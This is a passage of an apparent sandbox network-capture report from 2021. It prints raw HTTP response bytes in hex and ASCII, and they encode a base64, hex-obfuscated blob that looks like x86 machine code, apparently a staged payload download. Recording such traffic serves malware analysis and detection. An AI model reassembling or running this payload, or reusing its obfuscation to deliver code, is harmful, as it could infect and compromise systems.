67 52 6b 59 73 59 44 63 30 4c 47 41 77 52 53 78 67 4e 54 63 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 59 73 59
                                                                Data Ascii: FFLGBDQSxgRDEsYDU5LGBENixgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDQ4LGAwOCxgNTYsYDU3LGA4QixgN0QsYDBDLGAwMyxgRkYsYDU3LGA2QSxgMDAsYDUxLGA1MCxgRTgsYDQ2LGBFNixgRkYsYEZGLGA4QixgRjAsYDgzLGBDNCxgMTAsYDg1LGBGNixgNzQsYDEyLGA4NSxgRkYsYDc0LGAwRSxgNTcsYDZBLGAwMCxgNTYsY
                                                                2021-12-02 20:47:22 UTC1503INData Raw: 59 32 4c 47 41 34 52 43 78 67 4e 7a 41 73 59 44 41 78 4c 47 41 77 52 69 78 67 51 6a 59 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 55 77 4c 47 41 31 4d 69 78 67 4e 54 41 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4d 54 4d 73 59 45 55 77 4c 47 42 47 52 53 78 67 52 6b 59 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 4d 7a 67 73 59 44 41 32 4c 47 41 33 4e 43 78 67 4d 44 63 73 59 44 51 77 4c 47 41 34 4d 43 78 67 4d 30 4d 73 59 44 41 32 4c 47 41 77 4d 43 78 67 4e 7a 55 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 41 34 4c 47 41 30 4d 43 78 67 4e 54 41 73 59 44 55 32 4c 47 41 31 4d 79 78 67 52 54 67 73 59 45 55 33 4c 47 42 47 4d 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 4d 79 78 67 51 7a 51 73 59
                                                                Data Ascii: Y2LGA4RCxgNzAsYDAxLGAwRixgQjYsYDAwLGA4RCxgNTUsYEUwLGA1MixgNTAsYDU2LGBFOCxgMTMsYEUwLGBGRSxgRkYsYDMzLGBDMCxgODMsYEM0LGAwQyxgMzgsYDA2LGA3NCxgMDcsYDQwLGA4MCxgM0MsYDA2LGAwMCxgNzUsYEY5LGA4QixgNUQsYDA4LGA0MCxgNTAsYDU2LGA1MyxgRTgsYEU3LGBGMSxgRkYsYEZGLGA4MyxgQzQsY
                                                                2021-12-02 20:47:22 UTC1519INData Raw: 49 31 4c 47 42 47 4e 53 78 67 4e 6a 63 73 59 45 5a 43 4c 47 41 31 51 53 78 67 4d 55 45 73 59 44 4d 31 4c 47 42 47 4d 69 78 67 51 6a 59 73 59 45 56 47 4c 47 42 44 51 53 78 67 51 7a 45 73 59 44 46 45 4c 47 42 43 4f 53 78 67 51 54 6b 73 59 45 4d 78 4c 47 42 44 52 53 78 67 52 44 41 73 59 44 45 7a 4c 47 41 7a 4e 53 78 67 4d 6b 49 73 59 45 45 77 4c 47 41 35 4e 79 78 67 52 54 45 73 59 44 42 47 4c 47 41 34 4d 43 78 67 51 6b 51 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 67 78 4c 47 42 45 52 43 78 67 4e 7a 41 73 59 45 45 35 4c 47 42 42 51 79 78 67 52 54 51 73 59 44 52 44 4c 47 41 34 4d 53 78 67 52 6b 4d 73 59 44 42 47 4c 47 41 77 4f 53 78 67 4f 44 51 73 59 44 41 33 4c 47 41 34 52 43 78 67 4d 45 51 73 59 45 56 42 4c 47 41 35 4f 53 78 67 52 44 59 73 59
                                                                Data Ascii: I1LGBGNSxgNjcsYEZCLGA1QSxgMUEsYDM1LGBGMixgQjYsYEVGLGBDQSxgQzEsYDFELGBCOSxgQTksYEMxLGBDRSxgRDAsYDEzLGAzNSxgMkIsYEEwLGA5NyxgRTEsYDBGLGA4MCxgQkQsYEZELGBGRixgRkYsYDgxLGBERCxgNzAsYEE5LGBBQyxgRTQsYDRDLGA4MSxgRkMsYDBGLGAwOSxgODQsYDA3LGA4RCxgMEQsYEVBLGA5OSxgRDYsY
                                                                2021-12-02 20:47:22 UTC1535INData Raw: 6b 77 4c 47 41 30 4e 79 78 67 4f 44 55 73 59 44 46 45 4c 47 42 42 4f 53 78 67 4d 44 4d 73 59 44 49 31 4c 47 41 33 4d 69 78 67 51 54 59 73 59 44 51 79 4c 47 42 44 4d 43 78 67 4d 45 51 73 59 44 67 32 4c 47 41 78 4e 69 78 67 51 54 4d 73 59 44 45 77 4c 47 42 47 52 43 78 67 4d 45 49 73 59 44 4e 45 4c 47 41 77 4e 79 78 67 4d 45 51 73 59 45 49 35 4c 47 41 77 4e 69 78 67 4f 44 41 73 59 45 52 45 4c 47 41 79 4e 43 78 67 51 7a 45 73 59 44 42 45 4c 47 41 32 52 43 78 67 51 6a 4d 73 59 44 67 30 4c 47 41 30 4d 69 78 67 4f 45 51 73 59 44 67 77 4c 47 42 44 4e 43 78 67 4d 6a 49 73 59 44 55 32 4c 47 41 30 4e 69 78 67 4d 45 45 73 59 44 4d 31 4c 47 42 45 4e 79 78 67 4e 54 4d 73 59 44 4e 44 4c 47 42 46 4f 53 78 67 4e 6a 67 73 59 44 41 35 4c 47 42 42 4e 69 78 67 4e 7a 49 73 59
                                                                Data Ascii: kwLGA0NyxgODUsYDFELGBBOSxgMDMsYDI1LGA3MixgQTYsYDQyLGBDMCxgMEQsYDg2LGAxNixgQTMsYDEwLGBGRCxgMEIsYDNELGAwNyxgMEQsYEI5LGAwNixgODAsYERELGAyNCxgQzEsYDBELGA2RCxgQjMsYDg0LGA0MixgOEQsYDgwLGBDNCxgMjIsYDU2LGA0NixgMEEsYDM1LGBENyxgNTMsYDNDLGBFOSxgNjgsYDA5LGBBNixgNzIsY
                                                                2021-12-02 20:47:22 UTC1551INData Raw: 49 31 4c 47 41 32 4d 43 78 67 4e 55 55 73 59 44 6b 7a 4c 47 41 33 52 43 78 67 51 30 45 73 59 44 49 34 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 49 34 4c 47 41 77 4e 53 78 67 52 44 63 73 59 45 4a 46 4c 47 41 30 52 53 78 67 4e 44 6b 73 59 44 55 32 4c 47 41 30 52 69 78 67 4d 45 59 73 59 44 67 79 4c 47 41 34 4e 53 78 67 52 6b 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 7a 45 73 59 44 49 31 4c 47 41 33 4d 69 78 67 4d 6a 4d 73 59 44 4d 7a 4c 47 41 32 4f 43 78 67 4e 7a 67 73 59 45 46 44 4c 47 41 79 4d 79 78 67 4d 44 55 73 59 45 4a 42 4c 47 41 7a 52 43 78 67 4d 54 4d 73 59 45 55 35 4c 47 41 79 4f 53 78 67 4d 6b 51 73 59 45 4a 44 4c 47 41 79 4e 69 78 67 52 6a 51 73 59 44 68 47 4c 47 41 7a 4d 79 78 67 4d 45 51 73 59 45 4a 44 4c 47 41 7a 4f 53 78 67 4f 44 49 73 59
                                                                Data Ascii: I1LGA2MCxgNUUsYDkzLGA3RCxgQ0EsYDI4LGAwMCxgMDAsYDI4LGAwNSxgRDcsYEJFLGA0RSxgNDksYDU2LGA0RixgMEYsYDgyLGA4NSxgRkIsYEZGLGBGRixgQzEsYDI1LGA3MixgMjMsYDMzLGA2OCxgNzgsYEFDLGAyMyxgMDUsYEJBLGAzRCxgMTMsYEU5LGAyOSxgMkQsYEJDLGAyNixgRjQsYDhGLGAzMyxgMEQsYEJDLGAzOSxgODIsY
                                                                2021-12-02 20:47:22 UTC1567INData Raw: 52 44 4c 47 42 45 4d 53 78 67 4e 45 49 73 59 44 6c 44 4c 47 42 42 4f 43 78 67 4f 54 41 73 59 44 45 77 4c 47 42 42 4e 53 78 67 4d 55 45 73 59 45 51 35 4c 47 42 45 4d 53 78 67 51 6b 4d 73 59 44 4d 77 4c 47 42 45 4d 69 78 67 51 7a 67 73 59 44 51 34 4c 47 41 35 4d 43 78 67 4d 45 49 73 59 44 45 79 4c 47 42 45 4d 69 78 67 52 44 55 73 59 44 41 78 4c 47 42 46 51 53 78 67 51 54 51 73 59 44 49 78 4c 47 42 44 51 79 78 67 52 44 6b 73 59 44 52 46 4c 47 41 34 4e 69 78 67 4d 6a 67 73 59 44 52 43 4c 47 42 45 51 69 78 67 52 55 45 73 59 44 41 35 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 64 45 4c 47 41 7a 51 79 78 67 51 30 55 73 59 45 4d 33 4c 47 41 79 51 79 78 67 4f 54 63 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 44 67 73 59 45 45 34 4c 47 42 43 4d 69 78 67 52 55 45 73 59
                                                                Data Ascii: RDLGBEMSxgNEIsYDlDLGBBOCxgOTAsYDEwLGBBNSxgMUEsYEQ5LGBEMSxgQkMsYDMwLGBEMixgQzgsYDQ4LGA5MCxgMEIsYDEyLGBEMixgRDUsYDAxLGBFQSxgQTQsYDIxLGBDQyxgRDksYDRFLGA4NixgMjgsYDRCLGBEQixgRUEsYDA5LGBERixgRkMsYDdELGAzQyxgQ0UsYEM3LGAyQyxgOTcsYDNELGA5QSxgRDgsYEE4LGBCMixgRUEsY
                                                                2021-12-02 20:47:22 UTC1583INData Raw: 6c 47 4c 47 41 35 4e 43 78 67 4d 30 51 73 59 44 59 77 4c 47 41 33 51 53 78 67 51 7a 49 73 59 44 63 35 4c 47 41 7a 51 53 78 67 4e 44 49 73 59 44 6b 78 4c 47 42 42 4e 43 78 67 4e 45 51 73 59 45 4e 44 4c 47 41 32 4f 43 78 67 51 30 4d 73 59 45 5a 42 4c 47 41 79 52 53 78 67 4d 6b 55 73 59 45 4d 34 4c 47 42 43 51 53 78 67 4f 44 6b 73 59 44 67 77 4c 47 42 42 51 69 78 67 4e 55 59 73 59 45 52 43 4c 47 42 44 52 53 78 67 4d 6a 49 73 59 44 4a 43 4c 47 41 34 52 69 78 67 4d 30 49 73 59 44 51 33 4c 47 41 78 4e 43 78 67 4e 30 51 73 59 44 56 43 4c 47 41 35 4f 53 78 67 51 6b 45 73 59 45 4e 45 4c 47 41 7a 4d 53 78 67 4d 44 55 73 59 45 55 34 4c 47 41 7a 51 79 78 67 51 6b 51 73 59 44 6b 35 4c 47 41 33 51 79 78 67 51 55 51 73 59 44 46 44 4c 47 42 42 4f 43 78 67 4d 55 4d 73 59
                                                                Data Ascii: lGLGA5NCxgM0QsYDYwLGA3QSxgQzIsYDc5LGAzQSxgNDIsYDkxLGBBNCxgNEQsYENDLGA2OCxgQ0MsYEZBLGAyRSxgMkUsYEM4LGBCQSxgODksYDgwLGBBQixgNUYsYERCLGBDRSxgMjIsYDJCLGA4RixgM0IsYDQ3LGAxNCxgN0QsYDVCLGA5OSxgQkEsYENELGAzMSxgMDUsYEU4LGAzQyxgQkQsYDk5LGA3QyxgQUQsYDFDLGBBOCxgMUMsY
                                                                2021-12-02 20:47:22 UTC1599INData Raw: 6b 32 4c 47 41 30 52 53 78 67 4d 54 45 73 59 45 52 46 4c 47 42 47 52 69 78 67 4e 55 45 73 59 44 42 42 4c 47 41 30 51 69 78 67 51 30 59 73 59 45 51 30 4c 47 41 77 52 53 78 67 4d 7a 4d 73 59 45 4d 78 4c 47 41 34 51 69 78 67 4d 6a 67 73 59 44 51 32 4c 47 41 77 4d 53 78 67 4d 55 51 73 59 45 49 77 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 44 51 30 4c 47 42 45 4e 43 78 67 4f 55 59 73 59 44 6c 46 4c 47 41 77 52 69 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 47 4e 69 78 67 51 54 59 73 59 44 51 7a 4c 47 42 46 4f 43 78 67 51 6b 55 73 59 45 4e 42 4c 47 42 45 4d 79 78 67 51 30 51 73 59 45 5a 47 4c 47 42 45 4d 69 78 67 4f 54 49 73 59 45 4d 79 4c 47 41 30 4d 79 78 67 4e 54 49 73 59 45 55 35 4c 47 42 44 52 53 78 67 52 6a 67 73 59 45 59 35 4c 47 41 7a 52 69 78 67 4d 45 49 73 59
                                                                Data Ascii: k2LGA0RSxgMTEsYERFLGBGRixgNUEsYDBBLGA0QixgQ0YsYEQ0LGAwRSxgMzMsYEMxLGA4QixgMjgsYDQ2LGAwMSxgMUQsYEIwLGBGOCxgNTAsYDQ0LGBENCxgOUYsYDlFLGAwRixgQzEsYEMyLGBGNixgQTYsYDQzLGBFOCxgQkUsYENBLGBEMyxgQ0QsYEZGLGBEMixgOTIsYEMyLGA0MyxgNTIsYEU5LGBDRSxgRjgsYEY5LGAzRixgMEIsY
                                                                2021-12-02 20:47:22 UTC1615INData Raw: 41 33 4c 47 42 45 51 53 78 67 52 54 51 73 59 45 56 42 4c 47 42 47 4e 69 78 67 51 6a 67 73 59 44 68 42 4c 47 42 42 4d 79 78 67 4d 54 41 73 59 44 42 46 4c 47 41 30 4d 69 78 67 52 55 51 73 59 45 52 46 4c 47 42 46 4e 53 78 67 4d 45 51 73 59 45 4a 47 4c 47 41 7a 52 43 78 67 52 44 4d 73 59 45 5a 44 4c 47 42 42 4f 43 78 67 51 6b 51 73 59 44 51 79 4c 47 41 7a 4d 53 78 67 4e 7a 55 73 59 44 52 44 4c 47 41 7a 4d 53 78 67 4e 6a 4d 73 59 44 51 32 4c 47 41 35 51 79 78 67 52 44 45 73 59 44 4d 32 4c 47 41 35 51 79 78 67 52 54 63 73 59 44 49 30 4c 47 41 77 52 43 78 67 4e 44 4d 73 59 45 5a 45 4c 47 41 32 51 69 78 67 4e 30 45 73 59 45 52 47 4c 47 42 43 4e 53 78 67 4e 44 45 73 59 45 52 46 4c 47 42 43 4e 69 78 67 4e 44 6b 73 59 44 56 47 4c 47 42 46 4f 53 78 67 4f 54 45 73 59
                                                                Data Ascii: A3LGBEQSxgRTQsYEVBLGBGNixgQjgsYDhBLGBBMyxgMTAsYDBFLGA0MixgRUQsYERFLGBFNSxgMEQsYEJGLGAzRCxgRDMsYEZDLGBBOCxgQkQsYDQyLGAzMSxgNzUsYDRDLGAzMSxgNjMsYDQ2LGA5QyxgRDEsYDM2LGA5QyxgRTcsYDI0LGAwRCxgNDMsYEZELGA2QixgN0EsYERGLGBCNSxgNDEsYERFLGBCNixgNDksYDVGLGBFOSxgOTEsY
                                                                2021-12-02 20:47:22 UTC1631INData Raw: 45 77 4c 47 41 7a 4e 43 78 67 4d 54 41 73 59 44 51 77 4c 47 41 7a 4f 43 78 67 4e 45 49 73 59 45 4a 44 4c 47 41 30 4d 79 78 67 51 6a 51 73 59 45 49 34 4c 47 41 31 52 43 78 67 4e 6a 6b 73 59 44 45 31 4c 47 42 45 4e 43 78 67 4e 55 51 73 59 44 56 46 4c 47 42 44 51 53 78 67 51 7a 45 73 59 44 42 46 4c 47 41 35 51 53 78 67 4d 6a 51 73 59 45 46 45 4c 47 42 43 4f 53 78 67 4f 44 41 73 59 45 4d 33 4c 47 41 35 51 69 78 67 4d 54 41 73 59 44 59 7a 4c 47 42 47 52 69 78 67 51 54 59 73 59 45 59 30 4c 47 42 45 51 69 78 67 4d 45 45 73 59 44 63 32 4c 47 41 30 4d 79 78 67 52 55 55 73 59 44 56 42 4c 47 41 35 52 53 78 67 51 55 55 73 59 45 45 32 4c 47 41 34 4f 53 78 67 4e 30 55 73 59 44 5a 42 4c 47 41 30 52 43 78 67 4e 6a 41 73 59 44 42 47 4c 47 41 33 52 53 78 67 52 44 63 73 59
                                                                Data Ascii: EwLGAzNCxgMTAsYDQwLGAzOCxgNEIsYEJDLGA0MyxgQjQsYEI4LGA1RCxgNjksYDE1LGBENCxgNUQsYDVFLGBDQSxgQzEsYDBFLGA5QSxgMjQsYEFELGBCOSxgODAsYEM3LGA5QixgMTAsYDYzLGBGRixgQTYsYEY0LGBEQixgMEEsYDc2LGA0MyxgRUUsYDVBLGA5RSxgQUUsYEE2LGA4OSxgN0UsYDZBLGA0RCxgNjAsYDBGLGA3RSxgRDcsY
                                                                2021-12-02 20:47:22 UTC1647INData Raw: 52 47 4c 47 41 78 4d 69 78 67 4e 6a 51 73 59 44 59 33 4c 47 41 34 52 43 78 67 4d 45 45 73 59 45 51 79 4c 47 41 34 4d 43 78 67 4f 54 51 73 59 45 59 35 4c 47 41 35 4d 69 78 67 4e 45 51 73 59 45 59 31 4c 47 41 77 4d 53 78 67 4e 44 67 73 59 44 59 35 4c 47 41 78 4d 69 78 67 4f 44 49 73 59 45 55 32 4c 47 41 33 4e 79 78 67 51 6a 51 73 59 45 45 78 4c 47 41 34 51 69 78 67 51 54 4d 73 59 45 46 46 4c 47 42 43 4d 69 78 67 4f 54 51 73 59 44 42 46 4c 47 41 35 51 79 78 67 4d 54 67 73 59 45 59 79 4c 47 42 42 4d 43 78 67 52 44 55 73 59 45 49 79 4c 47 42 45 4d 53 78 67 51 54 49 73 59 44 63 35 4c 47 41 35 4e 69 78 67 52 44 6b 73 59 44 45 33 4c 47 41 78 4e 79 78 67 4e 30 51 73 59 44 67 30 4c 47 42 43 4d 53 78 67 52 54 51 73 59 45 51 34 4c 47 41 31 4f 53 78 67 4d 55 59 73 59
                                                                Data Ascii: RGLGAxMixgNjQsYDY3LGA4RCxgMEEsYEQyLGA4MCxgOTQsYEY5LGA5MixgNEQsYEY1LGAwMSxgNDgsYDY5LGAxMixgODIsYEU2LGA3NyxgQjQsYEExLGA4QixgQTMsYEFFLGBCMixgOTQsYDBFLGA5QyxgMTgsYEYyLGBBMCxgRDUsYEIyLGBEMSxgQTIsYDc5LGA5NixgRDksYDE3LGAxNyxgN0QsYDg0LGBCMSxgRTQsYEQ4LGA1OSxgMUYsY
                                                                2021-12-02 20:47:22 UTC1663INData Raw: 67 79 4c 47 41 30 4d 79 78 67 4d 6a 51 73 59 45 4a 47 4c 47 41 79 4d 43 78 67 52 55 4d 73 59 44 68 44 4c 47 41 79 4d 43 78 67 4d 6a 55 73 59 44 64 47 4c 47 41 33 4d 43 78 67 4f 55 59 73 59 44 67 35 4c 47 42 47 4e 69 78 67 4f 54 49 73 59 45 45 31 4c 47 41 79 52 69 78 67 4e 6b 59 73 59 44 4d 33 4c 47 42 45 52 43 78 67 4d 45 59 73 59 44 67 35 4c 47 41 79 4d 53 78 67 4d 54 41 73 59 45 46 43 4c 47 41 31 52 43 78 67 4e 7a 49 73 59 44 41 33 4c 47 42 42 4d 53 78 67 52 44 67 73 59 44 63 35 4c 47 42 43 4d 43 78 67 52 6a 67 73 59 45 59 31 4c 47 41 30 4e 43 78 67 52 6b 59 73 59 45 52 44 4c 47 42 43 4e 43 78 67 4e 6b 49 73 59 44 6b 34 4c 47 41 30 4f 43 78 67 4d 30 55 73 59 45 5a 46 4c 47 41 7a 4d 43 78 67 51 7a 51 73 59 44 52 46 4c 47 41 35 4d 43 78 67 4f 45 51 73 59
                                                                Data Ascii: gyLGA0MyxgMjQsYEJGLGAyMCxgRUMsYDhDLGAyMCxgMjUsYDdGLGA3MCxgOUYsYDg5LGBGNixgOTIsYEE1LGAyRixgNkYsYDM3LGBERCxgMEYsYDg5LGAyMSxgMTAsYEFCLGA1RCxgNzIsYDA3LGBBMSxgRDgsYDc5LGBCMCxgRjgsYEY1LGA0NCxgRkYsYERDLGBCNCxgNkIsYDk4LGA0OCxgM0UsYEZFLGAzMCxgQzQsYDRFLGA5MCxgOEQsY
                                                                2021-12-02 20:47:22 UTC1679INData Raw: 6b 77 4c 47 41 30 52 69 78 67 4e 54 41 73 59 44 6c 42 4c 47 41 33 4e 43 78 67 4e 44 63 73 59 45 4d 33 4c 47 41 32 4f 43 78 67 4f 55 51 73 59 44 68 45 4c 47 42 44 4f 53 78 67 4f 55 59 73 59 44 6c 44 4c 47 41 77 51 53 78 67 4d 54 4d 73 59 44 42 46 4c 47 41 78 4f 43 78 67 52 6b 49 73 59 45 52 46 4c 47 42 45 52 43 78 67 51 6a 4d 73 59 45 51 30 4c 47 41 34 4e 43 78 67 52 44 67 73 59 45 45 32 4c 47 42 43 51 79 78 67 52 55 59 73 59 44 5a 44 4c 47 41 7a 51 53 78 67 4e 7a 4d 73 59 45 52 42 4c 47 42 47 4f 43 78 67 51 7a 49 73 59 45 4d 7a 4c 47 41 35 51 53 78 67 4f 54 4d 73 59 44 4e 45 4c 47 42 46 51 69 78 67 4e 7a 4d 73 59 45 5a 46 4c 47 42 43 4d 69 78 67 4d 54 6b 73 59 44 59 35 4c 47 41 34 51 79 78 67 4d 55 55 73 59 44 52 43 4c 47 42 43 4e 79 78 67 52 44 41 73 59
                                                                Data Ascii: kwLGA0RixgNTAsYDlBLGA3NCxgNDcsYEM3LGA2OCxgOUQsYDhELGBDOSxgOUYsYDlDLGAwQSxgMTMsYDBFLGAxOCxgRkIsYERFLGBERCxgQjMsYEQ0LGA4NCxgRDgsYEE2LGBCQyxgRUYsYDZDLGAzQSxgNzMsYERBLGBGOCxgQzIsYEMzLGA5QSxgOTMsYDNELGBFQixgNzMsYEZFLGBCMixgMTksYDY5LGA4QyxgMUUsYDRCLGBCNyxgRDAsY
                                                                2021-12-02 20:47:22 UTC1695INData Raw: 56 44 4c 47 42 44 52 69 78 67 52 6a 63 73 59 44 51 79 4c 47 41 79 51 53 78 67 4e 30 55 73 59 44 52 43 4c 47 41 31 4f 53 78 67 52 6a 67 73 59 44 64 44 4c 47 41 79 52 53 78 67 4e 55 55 73 59 44 49 7a 4c 47 41 31 4e 69 78 67 4d 7a 49 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4d 6a 49 73 59 45 45 30 4c 47 41 7a 51 53 78 67 52 44 45 73 59 45 5a 46 4c 47 41 30 4f 43 78 67 4d 45 45 73 59 44 45 79 4c 47 42 46 51 69 78 67 52 45 55 73 59 44 49 34 4c 47 42 45 4d 79 78 67 4e 30 45 73 59 44 63 7a 4c 47 41 31 4f 43 78 67 52 54 59 73 59 45 45 7a 4c 47 41 7a 52 69 78 67 4e 54 49 73 59 45 5a 44 4c 47 41 35 4d 79 78 67 4e 54 63 73 59 44 6c 42 4c 47 42 46 52 53 78 67 51 6a 49 73 59 44 49 35 4c 47 41 33 4e 69 78 67 4e 6b 4d 73 59 44 49 30 4c 47 42 42 4f 53 78 67 51 7a 51 73 59
                                                                Data Ascii: VDLGBDRixgRjcsYDQyLGAyQSxgN0UsYDRCLGA1OSxgRjgsYDdDLGAyRSxgNUUsYDIzLGA1NixgMzIsYDU2LGA4OSxgMjIsYEE0LGAzQSxgRDEsYEZFLGA0OCxgMEEsYDEyLGBFQixgREUsYDI4LGBEMyxgN0EsYDczLGA1OCxgRTYsYEEzLGAzRixgNTIsYEZDLGA5MyxgNTcsYDlBLGBFRSxgQjIsYDI5LGA3NixgNkMsYDI0LGBBOSxgQzQsY
                                                                2021-12-02 20:47:22 UTC1711INData Raw: 6b 33 4c 47 41 35 51 53 78 67 4d 44 41 73 59 45 49 7a 4c 47 41 32 4d 43 78 67 4e 45 4d 73 59 44 45 35 4c 47 41 35 4e 53 78 67 51 55 51 73 59 45 55 78 4c 47 42 47 4e 43 78 67 51 55 45 73 59 45 51 77 4c 47 41 31 4f 53 78 67 4d 7a 67 73 59 45 55 35 4c 47 41 7a 52 53 78 67 4d 6a 59 73 59 45 59 30 4c 47 41 31 4e 69 78 67 4e 44 41 73 59 44 46 44 4c 47 42 46 4d 53 78 67 4d 7a 67 73 59 45 46 46 4c 47 42 46 4f 43 78 67 52 6a 49 73 59 45 5a 46 4c 47 42 45 52 43 78 67 4d 44 67 73 59 45 51 33 4c 47 41 34 4f 43 78 67 52 54 51 73 59 45 45 35 4c 47 42 44 4e 69 78 67 51 7a 63 73 59 44 51 34 4c 47 41 33 51 69 78 67 4e 54 63 73 59 44 4d 77 4c 47 42 44 52 43 78 67 4d 44 55 73 59 45 51 34 4c 47 41 31 4d 43 78 67 51 54 55 73 59 44 63 78 4c 47 42 44 4e 79 78 67 52 6a 55 73 59
                                                                Data Ascii: k3LGA5QSxgMDAsYEIzLGA2MCxgNEMsYDE5LGA5NSxgQUQsYEUxLGBGNCxgQUEsYEQwLGA1OSxgMzgsYEU5LGAzRSxgMjYsYEY0LGA1NixgNDAsYDFDLGBFMSxgMzgsYEFFLGBFOCxgRjIsYEZFLGBERCxgMDgsYEQ3LGA4OCxgRTQsYEE5LGBDNixgQzcsYDQ4LGA3QixgNTcsYDMwLGBDRCxgMDUsYEQ4LGA1MCxgQTUsYDcxLGBDNyxgRjUsY
                                                                2021-12-02 20:47:22 UTC1727INData Raw: 59 35 4c 47 41 34 4f 43 78 67 4e 6a 51 73 59 45 52 45 4c 47 41 79 4d 43 78 67 51 6a 49 73 59 44 64 43 4c 47 41 7a 51 53 78 67 4e 6b 51 73 59 44 45 35 4c 47 41 79 4f 43 78 67 4d 54 67 73 59 44 52 44 4c 47 42 45 4d 69 78 67 4d 30 4d 73 59 45 5a 47 4c 47 41 31 52 53 78 67 4d 54 45 73 59 45 4e 43 4c 47 41 33 4d 79 78 67 4d 6b 59 73 59 44 6b 35 4c 47 42 42 4d 53 78 67 51 6a 49 73 59 44 45 7a 4c 47 41 79 51 79 78 67 4f 44 45 73 59 45 49 77 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 45 30 4c 47 42 45 4e 43 78 67 4d 6b 45 73 59 44 49 78 4c 47 41 7a 52 43 78 67 4f 54 51 73 59 44 55 78 4c 47 42 42 52 53 78 67 52 6a 63 73 59 44 55 78 4c 47 41 34 51 79 78 67 4e 7a 49 73 59 44 41 7a 4c 47 42 44 4d 53 78 67 4e 6a 67 73 59 45 49 31 4c 47 41 7a 51 69 78 67 4f 54 6b 73 59
                                                                Data Ascii: Y5LGA4OCxgNjQsYERELGAyMCxgQjIsYDdCLGAzQSxgNkQsYDE5LGAyOCxgMTgsYDRDLGBEMixgM0MsYEZGLGA1RSxgMTEsYENCLGA3MyxgMkYsYDk5LGBBMSxgQjIsYDEzLGAyQyxgODEsYEIwLGAzNyxgRkUsYDE0LGBENCxgMkEsYDIxLGAzRCxgOTQsYDUxLGBBRSxgRjcsYDUxLGA4QyxgNzIsYDAzLGBDMSxgNjgsYEI1LGAzQixgOTksY
                                                                2021-12-02 20:47:22 UTC1743INData Raw: 42 43 4c 47 42 44 52 69 78 67 52 44 55 73 59 45 45 30 4c 47 42 44 4d 69 78 67 4e 6b 49 73 59 44 52 43 4c 47 41 7a 4e 43 78 67 4e 6a 55 73 59 44 67 79 4c 47 41 7a 4d 79 78 67 4e 7a 63 73 59 44 67 34 4c 47 42 47 4d 69 78 67 52 54 51 73 59 44 52 47 4c 47 41 7a 4e 53 78 67 4f 54 59 73 59 44 41 30 4c 47 41 34 4e 79 78 67 4f 44 55 73 59 44 6b 35 4c 47 41 79 4e 53 78 67 4d 30 59 73 59 45 4a 47 4c 47 41 34 4d 43 78 67 4d 6b 55 73 59 44 41 79 4c 47 42 47 51 53 78 67 4d 7a 67 73 59 44 51 32 4c 47 42 44 51 79 78 67 4d 44 41 73 59 44 4a 47 4c 47 41 32 52 69 78 67 4d 6a 6b 73 59 45 45 32 4c 47 41 32 4d 53 78 67 4e 6b 4d 73 59 44 42 45 4c 47 41 33 4e 53 78 67 4d 54 55 73 59 45 55 35 4c 47 41 77 51 53 78 67 4f 45 51 73 59 45 4e 45 4c 47 42 45 4d 79 78 67 51 6a 6b 73 59
                                                                Data Ascii: BCLGBDRixgRDUsYEE0LGBDMixgNkIsYDRCLGAzNCxgNjUsYDgyLGAzMyxgNzcsYDg4LGBGMixgRTQsYDRGLGAzNSxgOTYsYDA0LGA4NyxgODUsYDk5LGAyNSxgM0YsYEJGLGA4MCxgMkUsYDAyLGBGQSxgMzgsYDQ2LGBDQyxgMDAsYDJGLGA2RixgMjksYEE2LGA2MSxgNkMsYDBELGA3NSxgMTUsYEU5LGAwQSxgOEQsYENELGBEMyxgQjksY
                                                                2021-12-02 20:47:22 UTC1759INData Raw: 51 35 4c 47 41 31 4e 69 78 67 4d 7a 49 73 59 44 4d 79 4c 47 41 33 4d 79 78 67 4e 54 41 73 59 44 45 78 4c 47 41 34 52 53 78 67 52 54 45 73 59 44 6b 31 4c 47 42 43 4d 53 78 67 4e 30 4d 73 59 44 4a 43 4c 47 41 77 4e 53 78 67 4f 54 45 73 59 44 49 7a 4c 47 41 35 4f 43 78 67 4e 7a 63 73 59 44 4d 7a 4c 47 42 47 52 43 78 67 4d 44 41 73 59 44 63 35 4c 47 41 35 4f 53 78 67 4e 7a 49 73 59 44 63 34 4c 47 41 34 51 53 78 67 4e 44 45 73 59 44 4e 44 4c 47 41 7a 4f 43 78 67 4e 44 6b 73 59 45 4e 47 4c 47 42 42 51 69 78 67 4e 30 45 73 59 45 59 77 4c 47 41 78 4e 43 78 67 4d 7a 67 73 59 45 49 33 4c 47 41 35 52 69 78 67 52 54 59 73 59 44 45 33 4c 47 42 46 4e 79 78 67 4e 44 49 73 59 44 68 47 4c 47 42 43 51 79 78 67 4d 55 49 73 59 45 55 32 4c 47 41 31 4d 69 78 67 4f 54 6b 73 59
                                                                Data Ascii: Q5LGA1NixgMzIsYDMyLGA3MyxgNTAsYDExLGA4RSxgRTEsYDk1LGBCMSxgN0MsYDJCLGAwNSxgOTEsYDIzLGA5OCxgNzcsYDMzLGBGRCxgMDAsYDc5LGA5OSxgNzIsYDc4LGA4QSxgNDEsYDNDLGAzOCxgNDksYENGLGBBQixgN0EsYEYwLGAxNCxgMzgsYEI3LGA5RixgRTYsYDE3LGBFNyxgNDIsYDhGLGBCQyxgMUIsYEU2LGA1MixgOTksY
